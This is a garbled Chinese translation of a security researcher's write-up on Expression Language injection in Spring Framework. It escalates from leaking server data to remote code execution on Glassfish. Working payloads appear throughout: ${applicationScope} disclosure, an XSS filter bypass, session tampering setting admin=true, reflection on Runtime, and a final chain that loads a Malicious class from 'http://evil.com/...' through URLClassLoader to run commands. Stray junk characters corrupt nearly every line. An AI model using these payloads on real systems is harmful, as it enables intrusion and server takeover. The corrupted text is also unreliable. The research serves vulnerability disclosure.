Remote Code with
7 g7 n) s2 m: K: JExpression Language Injection
0 R9 Q- M, u, [; S. OSpring Framework脆弱性—DanAmodio# F$ _# z) o; [4 x
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中6 l% V; b5 Q- r
可能会存在风险。
$ _& |& l+ T9 t+ C+ u在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的. C0 k( A) U: S, p& N- A5 F3 t3 d
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
4 Q- V) ]& S! Z: F" p, {以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,. J" \7 q2 L$ V, }% Z0 R1 o
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前4 E. U) w! t. h0 w- S% W
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
* L2 R# Y8 Z, S. I; g/ Z; O+ F' C由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
/ P8 A' w' i) \1 S我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版: G- A. T' ]! i4 m1 q) [* q
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。( [6 x; [, a: \% I5 m5 K
这些版本不支持禁用double EL resolution.9 u# n5 k* V4 g% C
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含1 q" h) D: ~4 h) i( w0 k9 @
EL2.2容器上可能进行远程代码执行。
8 g. g) `5 ]% T% e* p这是一个原始信息泄露的攻击例子:
4 _/ ]3 `" _* f; [请求:& M0 u) }, N6 { `! R
ttp://vulnerable.com/foo?message=${applicationScope}
: g9 d' c4 \6 o2 X! k) _" j2 V到达以下内容页面:
+ q1 E* s7 ^5 W& d1 Y+ [1 q& d: \结果将输出一些包含内部服务器信息calsspath 和本地工作目录5 z( P, H5 _/ a
你也可以做一些其他事情,如这样:" S1 c6 D4 v; Y3 Z& |7 r
${9999+1}
6 A' W1 s$ l% n: f9 x( l还可以访问session 对象和beans; ]% C/ O! q# ? R
${employee.lastName}5 x! [; }* I& _" A: V: c
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
4 j E+ [! M) J4 x# h2 k6 oEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东0 j, S5 o8 f N) a" f- A j9 a
西,比如XSS.
' d; D! o- t, U9 U3 P哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
$ N$ _/ w% O& \: V* X/ d突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤# a' n: M6 n7 n) y' v
呢?”
( ~$ B+ E" I' A$ Y* F: \! m因此,我尝试巳缦拢�
" h* n+ g# a0 a' ~& t5 l0 ahttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
7 H( Q; n! s Z# X: b6 r* }P, R& [3 ]: J+ O; F$ D
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
- B7 N. ~& `, L, L1 e, \4 m A回的文本被插入进了spring:message 标签。
: k1 \0 B' I) ]+ R这里是一个最终绕过过滤的实例:$ I: U8 t9 K) e, k! l% Z
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ3 G% G4 D9 b- e; _$ u8 K8 v. |
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为- |$ X' e# A) l& Y6 R. g; z
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
2 x% Q# E; |4 Z/ c( O3 Q) g1 W经过一番研究,我学习到EL2.2 增加了方法调用。
* i, {- f5 C3 q/ x4 g; @5 S我写了一个快速测试应用程序代码并且检测一些功能
5 a- @% H7 a9 }& Q! f2 o${pageContext.request.getSession().setAttribute(“account”,”123456″)}) ^' ~( _4 w( ?; h- J, M" U
${pageContext.request.getSession().setAttribute(“admin”,true)}8 [0 \) U1 k) a8 H) R$ N" }
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的( T" c3 S. m/ \0 S& [5 B: ?
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?- R1 D" D+ A/ O( T y. m
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1' E: O* b& [9 m- v9 Y
“, 1234)}' X3 n/ T9 J |4 b8 u
${“”.getClass().forName(“java.lang.Runtime”)}, D/ g' \9 \2 C6 H5 m. B, q
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
+ g) ^0 f4 ]* q5 h+ p- k9 p可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
# p5 p2 i% F' Y' B( C: U; K, m数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
, X& }; Z( T5 c+ R9 `& @一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于9 ]! N$ ?/ a& N1 B/ v' i7 a
方法签名invoke(Object obj, Object„ args)
+ ~7 F' R" }* L+ ^, p& s; W& t# T! ^3 rJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问# W! ]6 g; D, l: M
题,以让它可以工作起来。
: o6 S F Z- i* ?$ Z) A漏洞利用:
' l* _# F" _/ q7 n我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我- d+ Z& N x9 }+ T2 o
希望你们中的一些JAVA奇才告诉我我是如此的可笑。5 s+ s# ?/ |5 Z; v
这里有一些我试过的失败的用例,为了试图让它工作的用例:
; e2 o5 Q) l2 }0 F: _ 写文件到文件系统. d& W; C7 R9 t6 p
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.- u. Q$ l. \$ V; Q! n$ X
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
/ ] I6 D0 K2 J. x4 a${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}$ Z' |" r* c0 j
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
& B1 r9 d& L( \% q, A# R% {7 \' @" gorg.springframework.expression.spel.standard.SpelExpressionParser not found$ ~" S" b7 h: w
by
$ L; H D$ ~( h$ b) c1 X3 ^9 morg.glassfish.web.javax.servlet.jsp [194].
: s' ^. S6 O( a. | 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
7 v/ U7 |( \ J; D: ^2 @ 利用反射来创建一个新的Runtime(and watch the world burn)6 a- }( v) o9 [) s9 C1 h
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName& u2 y; w F4 t/ T7 D+ U/ {
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
& M8 y+ c; `: h& F7 p${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
& ^2 W1 D: p4 @$ H5 J: y' ]* Z& O 使用java.lang.ProcessBuilder+ j" p7 F& g# k1 }; u' U3 }
用表达式语言来评估表达式语言
+ {3 B0 f1 y2 v% p BExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
2 V9 o; L% i1 ]${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
. U" y' u* b1 [2 [% k“,”".getClass(),null)}
! V6 X8 P6 ~0 O) D5 b* ]' U 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)( `' v5 z) y% j1 f' Y9 ^
我在使用一个空数组通过Method.invoke()时失败了很多次
- x; ~! w b: ]3 ^0 s, X+ B“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
7 J( |( _2 j& k9 T- a# ~+ J.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
! ?2 M o. Q$ k1 a- ^: [9 v' errayList”).newInstance().toArray())4 g1 k w/ Q# R" \9 t3 r
java.lang.IllegalArgumentException: wrong number of arguments ?3 W9 R+ N! _* A
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可, ^ [6 k2 i7 p( e! t& M
以创建一个恶意class文件并且指向类装载器.- q& [0 ?& u' n8 G' u" J$ C
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
6 {. U9 A" U- U, J* ppublic class Malicious {
4 l& z0 ]" Z* S7 S# fpublic Malicious() {
& f/ o& r: X! ]: x7 {: O" V( u/ Ytry {7 }$ s" v7 m& d
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
, \- o7 z1 w& n1 jjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
! L7 i3 i& h0 E" Z1 p$ e- E# X$ f} catch (Exception e) {+ k4 u7 o* j- i
}
( N5 v. u! ]: i}; a7 k) b [+ T/ R
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回7 D3 \5 K' A5 ^# w
话中,因此它可以被使用., v0 d( e$ P. o T. r# }! g6 E
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
8 l0 [% s5 V. i* ^' K. R(“java.util.ArrayList”).newInstance())}: |! o7 Y2 d& @1 j/ c) _
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
0 X2 I0 c, g, p: |# `) q一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
8 d0 |6 t; B$ E" O! cgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个0 E+ B0 n ~) S4 X) q7 k* s
我们可以调用的create(string)方法,然后转换对一个URL对象。6 ]9 }1 l! |9 ?0 U' |
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
8 E& \ ~) B) were/malicious/classfile/is/located/”).toURL())}
1 B0 ~2 ]8 y- y) `1 a然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
4 L6 ?/ m3 C3 w8 H& m5 N# d% a7 P7 H恶意类文件被装载并创建,触发远程代码.. H( Y6 J2 K9 |/ ?8 n) {
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
. Y% O& U- ]1 Q9 pxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().$ j/ @$ ~1 F! ?
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance( ]% s* J, i* {; |
()} |